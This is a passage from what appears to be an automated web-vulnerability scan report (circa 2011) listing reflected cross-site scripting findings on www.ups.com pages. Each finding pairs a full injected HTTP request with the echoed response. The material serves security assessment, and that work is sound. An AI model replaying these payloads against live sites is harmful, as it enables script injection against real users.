Path:   /content/us/en/siteguide/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload acee2"style%3d"x%3aexpression(alert(1))"ddaee83ec17 was submitted in the REST URL parameter 3. This input was echoed as acee2"style="x:expression(alert(1))"ddaee83ec17 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/enacee2"style%3d"x%3aexpression(alert(1))"ddaee83ec17/siteguide/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:40 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 61603


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/enacee2"style="x:expression(alert(1))"ddaee83ec17/siteguide/index.html">
...[SNIP]...

1.104. http://www.ups.com/content/us/en/tracking/fgv/index.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/tracking/fgv/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c574d"style%3d"x%3aexpression(alert(1))"6d4bfc86b05 was submitted in the REST URL parameter 2. This input was echoed as c574d"style="x:expression(alert(1))"6d4bfc86b05 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/usc574d"style%3d"x%3aexpression(alert(1))"6d4bfc86b05/en/tracking/fgv/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:26 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 45580


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/usc574d"style="x:expression(alert(1))"6d4bfc86b05/en/tracking/fgv/index.html">
...[SNIP]...

1.105. http://www.ups.com/content/us/en/tracking/fgv/index.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/tracking/fgv/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 743d0"style%3d"x%3aexpression(alert(1))"109bef8a77e was submitted in the REST URL parameter 3. This input was echoed as 743d0"style="x:expression(alert(1))"109bef8a77e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/en743d0"style%3d"x%3aexpression(alert(1))"109bef8a77e/tracking/fgv/index.html?WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:28 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 45619


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en743d0"style="x:expression(alert(1))"109bef8a77e/tracking/fgv/index.html?WT.svl=PNRO_L1">
...[SNIP]...

1.106. http://www.ups.com/content/us/en/tracking/quantumview/index.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/tracking/quantumview/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload edee3"style%3d"x%3aexpression(alert(1))"fe6f25a0e13 was submitted in the REST URL parameter 2. This input was echoed as edee3"style="x:expression(alert(1))"fe6f25a0e13 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/usedee3"style%3d"x%3aexpression(alert(1))"fe6f25a0e13/en/tracking/quantumview/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:26 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 46024


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/usedee3"style="x:expression(alert(1))"fe6f25a0e13/en/tracking/quantumview/index.html">
...[SNIP]...

1.107. http://www.ups.com/content/us/en/tracking/quantumview/index.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/tracking/quantumview/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a378c"style%3d"x%3aexpression(alert(1))"1991f7ee758 was submitted in the REST URL parameter 3. This input was echoed as a378c"style="x:expression(alert(1))"1991f7ee758 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/ena378c"style%3d"x%3aexpression(alert(1))"1991f7ee758/tracking/quantumview/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:30 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 45994


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/ena378c"style="x:expression(alert(1))"1991f7ee758/tracking/quantumview/index.html">
...[SNIP]...

1.108. http://www.ups.com/content/us/en/tracking/tools/index.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/tracking/tools/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee59f"style%3d"x%3aexpression(alert(1))"0706a145c41 was submitted in the REST URL parameter 2. This input was echoed as ee59f"style="x:expression(alert(1))"0706a145c41 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/usee59f"style%3d"x%3aexpression(alert(1))"0706a145c41/en/tracking/tools/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:27 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 36647


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/usee59f"style="x:expression(alert(1))"0706a145c41/en/tracking/tools/index.html">
...[SNIP]...

1.109. http://www.ups.com/content/us/en/tracking/tools/index.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/tracking/tools/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5067b"style%3d"x%3aexpression(alert(1))"35b30889967 was submitted in the REST URL parameter 3. This input was echoed as 5067b"style="x:expression(alert(1))"35b30889967 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/en5067b"style%3d"x%3aexpression(alert(1))"35b30889967/tracking/tools/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:28 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 36686


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en5067b"style="x:expression(alert(1))"35b30889967/tracking/tools/index.html">
...[SNIP]...

1.110. http://www.ups.com/dropoff [WT.svl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /dropoff

Issue detail

The value of the WT.svl request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae02b"><script>alert(1)</script>38862b532a9 was submitted in the WT.svl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dropoff?loc=en_US&WT.svl=ae02b"><script>alert(1)</script>38862b532a9 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:43 GMT
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 30396


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<IFRAME style="height: 1200px;" src="http://maps.ups.com/UPSGlobalLocator/Search/?WT.svl=ae02b"><script>alert(1)</script>38862b532a9&loc=en_US" id="doliframe" name="doliframe" width="985" frameborder="0">
...[SNIP]...

1.111. http://www.ups.com/dropoff [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /dropoff

Issue detail

The value of the loc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee95c"><script>alert(1)</script>d2cceec571c was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dropoff?loc=ee95c"><script>alert(1)</script>d2cceec571c&WT.svl=PriNav HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:38 GMT
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 30397


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<IFRAME style="height: 1200px;" src="http://maps.ups.com/UPSGlobalLocator/Search/?WT.svl=PriNav&loc=ee95c"><script>alert(1)</script>d2cceec571c" id="doliframe" name="doliframe" width="985" frameborder="0">
...[SNIP]...

1.112. http://www.ups.com/dropoff [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /dropoff

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d3d2"><script>alert(1)</script>ec5ea0bf3fe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dropoff?9d3d2"><script>alert(1)</script>ec5ea0bf3fe=1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:31 GMT
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 30381


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<IFRAME style="height: 1200px;" src="http://maps.ups.com/UPSGlobalLocator/Search/?9d3d2"><script>alert(1)</script>ec5ea0bf3fe=1" id="doliframe" name="doliframe" width="985" frameborder="0">
...[SNIP]...

1.113. https://www.ups.com/account/am/start [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /account/am/start

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript rest-of-line comment. The payload 129ef%0a3d98201dc8b was submitted in the REST URL parameter 2. This input was echoed as 129ef
3d98201dc8b
in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /account/am129ef%0a3d98201dc8b/start HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:36 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44390


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...

theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + 'https://www.ups.com/account/am129ef
3d98201dc8b
/start';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/account/am129ef

...[SNIP]...

1.114. https://www.ups.com/account/am/start [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /account/am/start

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e95b6"%20a%3db%2029ba2d4500a was submitted in the REST URL parameter 2. This input was echoed as e95b6" a=b 29ba2d4500a in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /account/ame95b6"%20a%3db%2029ba2d4500a/start HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:29 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44491


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="https://www.ups.com/account/ame95b6" a=b 29ba2d4500a/start">
...[SNIP]...

1.115. https://www.ups.com/account/am/start [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /account/am/start

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 31909'%3bb572ec76daa was submitted in the REST URL parameter 2. This input was echoed as 31909';b572ec76daa in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /account/am31909'%3bb572ec76daa/start HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:33 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44407


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
c76daa/start';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/account/am31909';b572ec76daa/start';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + 'https://www.ups.com/account/am31909';b572ec76daa/start';
actionUrl = "/one-to-one/login?ID=100&
...[SNIP]...

1.116. https://www.ups.com/account/am/start [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /account/am/start

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52ab7"%20a%3db%2059b95f1602b was submitted in the REST URL parameter 3. This input was echoed as 52ab7" a=b 59b95f1602b in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /account/am/start52ab7"%20a%3db%2059b95f1602b HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:44 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44491


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="https://www.ups.com/account/am/start52ab7" a=b 59b95f1602b">
...[SNIP]...

1.117. https://www.ups.com/account/am/start [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /account/am/start

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript rest-of-line comment. The payload bdcfa%0ae0b29bf97aa was submitted in the REST URL parameter 3. This input was echoed as bdcfa
e0b29bf97aa
in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /account/am/startbdcfa%0ae0b29bf97aa HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:49 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44390


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + 'https://www.ups.com/account/am/startbdcfa
e0b29bf97aa
';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/account/am/startbdcfa

...[SNIP]...

1.118. https://www.ups.com/account/am/start [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /account/am/start

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 832ad'%3b70dba7c9613 was submitted in the REST URL parameter 3. This input was echoed as 832ad';70dba7c9613 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /account/am/start832ad'%3b70dba7c9613 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:47 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44407


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
7c9613';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/account/am/start832ad';70dba7c9613';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + 'https://www.ups.com/account/am/start832ad';70dba7c9613';
actionUrl = "/one-to-one/login?ID=100&loc="
...[SNIP]...

1.119. https://www.ups.com/account/am/start [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /account/am/start

Issue detail

The value of the loc request parameter is copied into a JavaScript rest-of-line comment. The payload %00e96d0</script><script>alert(1)</script>eeee4ba8d58 was submitted in the loc parameter. This input was echoed as e96d0</script><script>alert(1)</script>eeee4ba8d58 in the application's response.

